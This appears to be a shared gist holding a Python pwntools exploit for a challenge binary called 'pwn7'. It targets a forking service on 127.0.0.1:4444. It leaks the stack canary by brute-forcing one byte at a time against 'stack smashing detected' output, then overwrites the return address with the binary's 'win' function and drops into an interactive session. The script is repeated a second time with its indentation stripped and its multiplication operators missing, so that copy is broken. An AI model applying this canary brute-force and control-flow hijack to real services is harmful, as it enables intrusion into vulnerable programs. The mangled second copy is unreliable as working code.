ikerl/pwn7_exploit.py Secret

## pwn7_exploit.py
from pwn import *
import sys,os,time

i = 0

LOCAL = False

def fork(canary):
    global i
    if i == 0xa:
        io.send(canary+b"\x00\n")
        return canary+b"\x00"
    io.sendline(canary+i.to_bytes(1, 'big'))
    return canary+i.to_bytes(1, 'big')

def test_canary(canary):
    io.sendline(canary)
    print("Testing canary..")

def parent():
    io.sendline("y")

def parent_exploit(canary):
    print("Exploiting pwn7..")
    io.sendline(b"\x00"*16+canary[16:20]+p32(elf.symbols["win"])*8+p32(elf.symbols["main"]))
    io.interactive()

if LOCAL:
    io = process("./p")
else:
    io = remote("127.0.0.1",4444)

elf = ELF("./p")
canary = b"\x00"*17

line = io.recvline()

tested_canary = False
while True:
    if b"(0-1000):" in line:
        if len(canary) < 21:
            fork(canary)
        else:
            test_canary(canary)
            tested_canary = True
    elif b"(y/n)" in line:
        if not tested_canary:
            parent()
        else:
            parent_exploit(canary)

    if not LOCAL:
        time.sleep(0.02)

    line = io.recvline()

    if not LOCAL:
        time.sleep(0.02)

    if LOCAL:
        if tested_canary:
            if b"Noooope" in line:
                line = io.recvline()
                if b"stack smashing detected" not in line:
                    print("Canary OK")
                else:
                    print("Wrong canary")
                    sys.exit(-1)
        else:
            if b"Noooope" in line:
                line = io.recvline()
                if b"stack smashing detected" not in line:
                    canary += i.to_bytes(1, 'big')
                    print("Leaked canary:",canary[17:])
                    i = 0
                else:
                    i += 1
    else:
        if tested_canary:
            if b"Noooope" in line:
                print("Canary OK")
        else:
            if b"Noooope" in line:
                canary += i.to_bytes(1, 'big')
                print("Leaked canary:",canary[17:])
                i = 0
            else:
                i += 1
	from pwn import *
	import sys,os,time

	i = 0

	LOCAL = False

	def fork(canary):
	global i
	if i == 0xa:
	io.send(canary+b"\x00\n")
	return canary+b"\x00"
	io.sendline(canary+i.to_bytes(1, 'big'))
	return canary+i.to_bytes(1, 'big')

	def test_canary(canary):
	io.sendline(canary)
	print("Testing canary..")

	def parent():
	io.sendline("y")

	def parent_exploit(canary):
	print("Exploiting pwn7..")
	io.sendline(b"\x00"16+canary[16:20]+p32(elf.symbols["win"])8+p32(elf.symbols["main"]))
	io.interactive()

	if LOCAL:
	io = process("./p")
	else:
	io = remote("127.0.0.1",4444)

	elf = ELF("./p")
	canary = b"\x00"*17

	line = io.recvline()

	tested_canary = False
	while True:
	if b"(0-1000):" in line:
	if len(canary) < 21:
	fork(canary)
	else:
	test_canary(canary)
	tested_canary = True
	elif b"(y/n)" in line:
	if not tested_canary:
	parent()
	else:
	parent_exploit(canary)

	if not LOCAL:
	time.sleep(0.02)

	line = io.recvline()

	if not LOCAL:
	time.sleep(0.02)

	if LOCAL:
	if tested_canary:
	if b"Noooope" in line:
	line = io.recvline()
	if b"stack smashing detected" not in line:
	print("Canary OK")
	else:
	print("Wrong canary")
	sys.exit(-1)
	else:
	if b"Noooope" in line:
	line = io.recvline()
	if b"stack smashing detected" not in line:
	canary += i.to_bytes(1, 'big')
	print("Leaked canary:",canary[17:])
	i = 0
	else:
	i += 1
	else:
	if tested_canary:
	if b"Noooope" in line:
	print("Canary OK")
	else:
	if b"Noooope" in line:
	canary += i.to_bytes(1, 'big')
	print("Leaked canary:",canary[17:])
	i = 0
	else:
	i += 1